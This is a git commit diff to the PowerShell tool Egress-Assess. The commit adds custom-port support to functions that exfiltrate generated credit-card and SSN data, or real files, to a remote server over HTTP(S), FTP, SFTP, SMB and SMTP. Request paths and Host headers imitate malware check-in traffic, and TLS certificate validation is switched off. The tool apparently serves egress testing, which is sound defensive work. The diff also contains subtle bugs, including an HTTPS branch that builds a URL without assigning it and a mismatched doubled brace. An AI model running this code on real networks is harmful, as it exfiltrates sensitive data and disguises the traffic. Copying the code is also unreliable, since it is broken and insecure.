Added port in for most protocols and actor modules

master
Chris Truncer 2018-06-22 14:58:19 -06:00
parent 62ab4d30cd
commit b5f5986014
No known key found for this signature in database
GPG Key ID: 9715AC2B40A5A64A
1 changed files with 212 additions and 50 deletions

View File

@ -57,9 +57,12 @@ function Invoke-EgressAssess
This switch reduces the time required to generate fake data. This switch reduces the time required to generate fake data.
Note: Fake CC and SSN data will be generated in batches of 500 sequential values. Note: Fake CC and SSN data will be generated in batches of 500 sequential values.
.Parameter Port
The port is if you wish to specify a non-standard port for data transfer(s)
.Example .Example
Import-Module Egress-Assess.ps1 Import-Module Egress-Assess.ps1
Invoke-EgressAssess -client http -ip 127.0.0.1 -Datatype cc -Size 50 -Loop 20 -Fast -Verbose Invoke-EgressAssess -client http -ip 127.0.0.1 -Datatype cc -Size 50 -Port 8080 -Loop 20 -Fast -Verbose
Invoke-EgressAssess -client ftp -ip 127.0.0.1 -Username user -Password pass -Datatype ssn -Size 10 -Verbose Invoke-EgressAssess -client ftp -ip 127.0.0.1 -Username user -Password pass -Datatype ssn -Size 10 -Verbose
Invoke-EgressAssess -client smb -ip 127.0.0.1 -Datatype "c:\Users\testuser\secrets.xlsx" -Verbose Invoke-EgressAssess -client smb -ip 127.0.0.1 -Datatype "c:\Users\testuser\secrets.xlsx" -Verbose
Invoke-EgressAssess -client icmp -ip 127.0.0.1 -Datatype ssn -Report -Verbose Invoke-EgressAssess -client icmp -ip 127.0.0.1 -Datatype ssn -Report -Verbose
@ -88,6 +91,8 @@ function Invoke-EgressAssess
[Parameter(Mandatory = $False)] [Parameter(Mandatory = $False)]
[string]$Password, [string]$Password,
[Parameter(Mandatory = $False)] [Parameter(Mandatory = $False)]
[int]$Port,
[Parameter(Mandatory = $False)]
[int]$Size = 1, [int]$Size = 1,
[Parameter(Mandatory = $False)] [Parameter(Mandatory = $False)]
[int]$Loops = 1, [int]$Loops = 1,
@ -145,34 +150,37 @@ function Invoke-EgressAssess
} }
else else
{ {
if ($client -eq "http") if(!$Port)
{ {
$port = 80 if ($client -eq "http")
} {
elseif ($client -eq "https") $port = 80
{ }
$port = 443 elseif ($client -eq "https")
} {
elseif ($client -eq "ftp") $port = 443
{ }
$port = 21 elseif ($client -eq "ftp")
} {
elseif ($client -eq "sftp") $port = 21
{ }
$port = 22 elseif ($client -eq "sftp")
} {
elseif ($client -eq "smtp") $port = 22
{ }
$port = 25 elseif ($client -eq "smtp")
} {
elseif ($client -eq "smb") $port = 25
{ }
$port = 445 elseif ($client -eq "smb")
} {
else $port = 445
{ }
Write-Verbose "[*] Protocol not available." else
throw "Error" {
Write-Verbose "[*] Protocol not available."
throw "Error"
}
} }
#attempt to test connection to TCP ports #attempt to test connection to TCP ports
@ -546,11 +554,26 @@ function Invoke-EgressAssess
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/major/images/view.php" if (!$Port)
{
$Url = "http://" + $IP + "/major/images/view.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/major/images/view.php"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/major/images/view.php" if (!$Port)
{
$Url = "https://" + $IP + "/major/images/view.php"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/major/images/view.php"
}
} }
$ranHost = Get-Random -InputObject $checkinDomains $ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -575,11 +598,27 @@ function Invoke-EgressAssess
# Checkin Request 2 # Checkin Request 2
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/major/txt/read.php" if(!$Port)
{
$Url = "http://" + $IP + "/major/txt/read.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/major/txt/read.php"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/major/txt/read.php" if(!$Port)
{
$Url = "https://" + $IP + "/major/txt/read.php"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/major/txt/read.php"
}
} }
$ranHost = Get-Random -InputObject $checkinDomains $ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -607,11 +646,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $checkinDomains $ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -693,11 +748,27 @@ function Invoke-EgressAssess
# Checkin Request # Checkin Request
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/home/index.asp?typeid=13" if (!$Port)
{
$Url = "http://" + $IP + "/home/index.asp?typeid=13"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/home/index.asp?typeid=13"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/home/index.asp?typeid=13" if(!$Port)
{
$Url = "https://" + $IP + "/home/index.asp?typeid=13"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/home/index.asp?typeid=13"
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -723,11 +794,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else {
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -989,11 +1076,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -1100,11 +1203,27 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris $ranURI = Get-Random -InputObject $uris
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + $ranURI if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + $ranURI if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
} }
$ranHost = Get-Random -InputObject $domains $ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
@ -1233,11 +1352,27 @@ function Invoke-EgressAssess
} }
if ($client -eq "http") if ($client -eq "http")
{ {
$Url = "http://" + $IP + "/post_data.php" if (!$Port)
{
$Url = "http://" + $IP + "/post_data.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/post_data.php"
}
} }
elseif ($client -eq "https") elseif ($client -eq "https")
{ {
$Url = "https://" + $IP + "/post_data.php" if (!$Port)
{
$Url = "https://" + $IP + "/post_data.php"
}
else
{
"https://" + $IP + ":" + $Port + "/post_data.php"
}
} }
} }
@ -1353,7 +1488,15 @@ function Invoke-EgressAssess
} }
if ($filetransfer -eq $True) if ($filetransfer -eq $True)
{ {
$Destination = "ftp://" + $IP + "/" + $Path if (!$Port)
{
$Destination = "ftp://" + $IP + "/" + $Path
}
else
{
$Destination = "ftp://" + $IP + ":" + $Port + "/" + $Path
}
$SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName }
$webclient = New-Object System.Net.WebClient $webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password) $webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password)
@ -1376,7 +1519,16 @@ function Invoke-EgressAssess
{ {
$Date = Get-Date -Format Mdyyyy_hhmmss $Date = Get-Date -Format Mdyyyy_hhmmss
$Path = "ftpdata" + $Date + ".txt" $Path = "ftpdata" + $Date + ".txt"
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + "/" + $Path
if (!$Port)
{
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + "/" + $Path
}
else
{
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + ":" + $Port + "/" + $Path
}
$ftpClient = New-Object System.Net.WebClient $ftpClient = New-Object System.Net.WebClient
$uri = New-Object System.Uri($Destination) $uri = New-Object System.Uri($Destination)
@ -1482,10 +1634,15 @@ function Invoke-EgressAssess
Break Break
} }
} }
# Connect to Egress-Assess Server # Connect to Egress-Assess Server
if(!$Port)
{
$Port = 22
}
try try
{ {
$Con = New-Object Renci.SshNet.PasswordConnectionInfo($IP, $Username, $Password) $Con = New-Object Renci.SshNet.PasswordConnectionInfo($IP, $Port, $Username, $Password)
$sftpClient = New-Object Renci.SshNet.SftpClient($Con) $sftpClient = New-Object Renci.SshNet.SftpClient($Con)
$sftpClient.Connect() $sftpClient.Connect()
} }
@ -1582,13 +1739,18 @@ function Invoke-EgressAssess
{ {
Try Try
{ {
if (!$Port)
{
$Port = 25
}
if ($filetransfer -eq $true) if ($filetransfer -eq $true)
{ {
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP -Port $Port
} }
else else
{ {
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP -Port $Port
} }
} }
catch catch